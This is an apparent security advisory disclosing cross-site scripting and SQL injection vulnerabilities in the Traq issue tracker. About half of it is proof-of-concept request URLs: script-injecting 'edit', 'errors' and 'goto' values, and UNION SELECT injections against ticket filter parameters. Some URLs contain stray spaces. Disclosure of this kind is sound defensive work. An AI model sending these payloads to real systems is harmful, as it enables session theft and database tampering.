High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Traq which could be exploited to perform cross-site scripting and SQL injection attacks.
1) Cross-site scripting (XSS) vulnerabilities in Traq
1.1 The vulnerability exists due to input sanitation error in the "edit" parameter in admincp/components.php, admincp/ticket_templates.php, admincp/custom_fields.php and admincp/groups.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation examples:
http://[host]/admincp/components.php?edit=%22%3E%3Cscript%3Ealert%28document .cookie%29;%3C/script%3E
http://[host]/admincp/ticket_templates.php?edit=%2 2%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E
http://[host]/admincp/custom_fields.php?edit=%22%3E%3Cscript%3Ealert %28document.cookie%29;%3C/script %3E
http://[host]/admincp/groups.php?edit=%22%3E%3Cscript%3Ealert%28documen t.cookie%29;%3C/script%3E
1.2 The vulnerability exists due to input sanitation error in the "errors" parameter in admincp/components.php, admincp/groups.php, admincp/milestones.php, admincp/plugins.php, admincp/projects.php, admincp/repositories.php and admincp/users.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface and that "register_globals" is enabled.
Exploitation examples:
http://[host]/admincp/components.php?edit&error&errors[]=%3Cscript%3Ealert%2 8document.cookie%29;%3C/ script%3E
http://[host]/admincp/groups.php?edit&errors[]=%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
http://[host]/admincp/milestones.php?edi t&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
http://[host]/admincp/plugins.php?create&errors[]=%3Cscript%3Ealert%28d ocument.cookie%29;%3C/script% 3E
http://[host]/admincp/projects.php?edit&errors[]=%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3 E
http://[host]/admincp/repositories.php?edit&errors[]=%3Cscript%3Ealert%28 document.cookie%29;%3C/scri pt%3E
http://[host]/admincp/users.php?edit&errors[]=%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E
1.3 The vulnerability exists due to input sanitation error in the "goto" parameter in user/login. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://[host]/user/login?goto=%22%3E%3Cscript%3Ealert%28document.cookie%29;% 3C/script%3E
2) SQL injection vulnerabilities in Traq
The vulnerability exists due to input sanitation errors in the "sort","order","component","milestone","priority","severity","status","type" and "version" parameters. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation examples:
http://[host]/[PROJECT_ID]/tickets?sort=SQL_CODE_HERE
http://[host]/[PROJEC T_ID]/tickets?order=SQL_CODE_HERE
http://[host]/[PROJECT_ID]/tickets?column s=ticket&component=1%29/**/union/**/select/**/1,version%28% 29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/** /where/**/1/**/in/**/%28 1
http://[host]/[PROJECT_ID]/tickets?columns=ticket&milestone=1%29/**/union /**/select/**/1,version%28% 29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/** /where/**/1/**/in/**/%28 1
http://[host]/[PROJECT_ID]/tickets?columns=ticket&priority=1%29/**/union/ **/select/**/1,version%28%2 9,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/ where/**/1/**/in/**/%281
http://[host]/[PROJECT_ID]/tickets?columns=ticket& severity=1%29/**/union/**/select/**/1,version%28%2 9,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/ where/**/1/**/in/**/%281
http://[host]/[PROJECT_ID]/tickets?columns=ticket& status=1%29/**/union/**/select/**/1,version%28%29, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/wh ere/**/1/**/in/**/%281
http://[host]/[PROJECT_ID]/tickets?columns=ticket&ty pe=1%29/**/union/**/select/**/1,version%28%29,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/wher e/**/1/**/in/**/%281
http://[host]/[PROJECT_ID]/tickets?columns=ticket&vers ion=1%29/**/union/**/select/**/1,version%28%29 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/w here/**/1/**/in/**/%281
|
